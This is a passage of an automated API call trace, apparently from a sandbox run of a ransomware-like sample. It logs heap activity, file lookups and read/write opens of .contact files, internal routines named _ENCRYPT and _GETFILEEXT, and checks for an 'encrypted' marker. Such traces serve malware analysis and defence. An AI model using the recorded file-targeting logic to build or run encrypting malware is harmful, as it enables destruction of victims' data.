Flags=0x0, Size=0x10) returned 0x889ac0 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0029.179] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0029.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0029.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0029.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0029.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0029.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0029.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0029.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0029.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0029.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0029.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0029.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0029.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0029.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0029.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0029.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0029.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0029.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0029.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0029.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0029.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0029.181] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0029.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0029.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0029.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0029.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0029.182] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0029.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0029.182] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0029.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0029.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0029.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0029.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0029.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.182] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 0x7c20c0 [0029.183] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.183] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0029.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0029.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0029.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0029.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0029.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0029.183] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 0x7c20c0 [0029.184] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.184] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0029.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0029.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.184] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.184] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.184] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.184] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.184] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.184] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0029.184] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.184] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0029.184] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.185] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0029.185] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.185] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.185] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.185] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0029.185] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.186] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.186] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0029.186] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.186] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0029.186] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.186] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0029.186] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0029.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.186] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.186] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.186] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.186] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 0x7c20c0 [0029.187] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.187] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.187] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 0x7c20c0 [0029.188] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.188] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Contacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.189] 